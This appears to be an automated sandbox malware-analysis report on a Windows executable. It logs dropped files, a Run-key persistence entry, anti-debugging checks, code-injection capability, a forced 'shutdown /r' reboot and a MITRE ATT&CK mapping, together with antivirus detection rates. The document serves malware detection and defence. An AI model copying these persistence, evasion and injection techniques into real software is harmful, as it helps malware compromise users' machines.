Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll	Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: leg#U00edvel9931-009-140.08372236.exe

Static file information: File size 11252752 > 1048576

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x272c00
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x28e400

Source: leg#U00edvel9931-009-140.08372236.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr
Source:	Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: 8pIuMUYQX9q.exe, 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000006.00000000.2051733417.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000002.4145964148.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, 8pIuMUYQX9q.exe, 00000007.00000000.2132584136.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmp, ClassicIE_64.exe.0.dr

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

6_2_00007FF6B40A1000

Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: .xdata
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /4
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /19
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /32
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /46
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /65
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /78
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: /90
Source: leg#U00edvel9931-009-140.08372236.exe	Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	File created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIEDLL_64.dll	Jump to dropped file

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ng3DJyCjjqIdyv			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180037F9C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_0000000180037F9C

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Window / User API: threadDelayed 5032			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Window / User API: threadDelayed 1590			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API coverage: 6.5 %
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API coverage: 1.2 %

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 2000	Thread sleep time: -5032000s >= -30000s	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 5600	Thread sleep time: -3432000s >= -30000s	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 4632	Thread sleep time: -1428000s >= -30000s	Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe TID: 6020	Thread sleep time: -1590000s >= -30000s	Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A528EDC FindFirstFileExW,	6_2_00007FFE1A528EDC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180055750 FindFirstFileExW,	6_2_0000000180055750
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180055750 FindFirstFileExW,	7_2_0000000180055750

Source: leg#U00edvel9931-009-140.08372236.exe, 00000000.00000002.1984599299.00000232A23C2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API call chain: ExitProcess graph end node			graph_6-47363
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	API call chain: ExitProcess graph end node			graph_6-47299

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_00007FF6B40A31EC

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FFE1A511800 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,VirtualFree,SetLastError,VirtualFree,VirtualFree,VirtualFree,SetLastError,VirtualAlloc,SetLastError,SetLastError,

6_2_00007FFE1A511800

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A31EC RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF6B40A31EC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A1840 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF6B40A1840
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A3874 SetUnhandledExceptionFilter,	6_2_00007FF6B40A3874
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FF6B40A94B8 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FF6B40A94B8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A517ABC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FFE1A517ABC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A51EB04 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00007FFE1A51EB04
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_00007FFE1A517360 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FFE1A517360
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 6_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0000000180039820
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_000000018003924C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_000000018003924C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180041394 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0000000180041394
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: 7_2_0000000180039820 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0000000180039820

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

6_2_00007FF6B40A1000

Contains functionality to inject threads in other processes

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

6_2_00007FF6B40A1000

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_0000000180006380 GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,mouse_event,mouse_event,Sleep,mouse_event,GetSystemMetrics,GetSystemMetrics,mouse_event,Sleep,

6_2_0000000180006380

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30

Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FFE1A531F20 cpuid

6_2_00007FFE1A531F20

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoA,	6_2_00007FF6B40A8FF0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	6_2_00007FFE1A52E268
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_00007FFE1A52EACC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	6_2_00007FFE1A52EB7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	6_2_00007FFE1A528048
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	6_2_00007FFE1A52E974
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_00007FFE1A52E694
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_00007FFE1A52E72C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_00007FFE1A52ECB0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_00007FFE1A527CB4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_00007FFE1A52E5C4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	6_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: try_get_function,GetLocaleInfoW,	6_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	6_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_000000018005ABC4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	6_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	6_2_000000018005AEA8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_000000018005B000
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	7_2_000000018005B0B0
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_000000018005B1DC
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: try_get_function,GetLocaleInfoW,	7_2_000000018004F34C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_000000018005A7A8
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	7_2_000000018005AAF4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	7_2_000000018005ABC4
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_000000018005AC5C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: EnumSystemLocalesW,	7_2_000000018004ED7C
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Code function: GetLocaleInfoW,	7_2_000000018005AEA8

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\ng3DJyCjjqIdyv.zip VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Queries volume information: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas VolumeInformation			Jump to behavior

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00007FF6B40A4AB4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

6_2_00007FF6B40A4AB4

Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe

Code function: 6_2_00000001800502BC _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

6_2_00000001800502BC

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	211 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	211 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
leg#U00edvel9931-009-140.08372236.exe	21%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe (copy)	0%	ReversingLabs
C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\ClassicIE_64.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

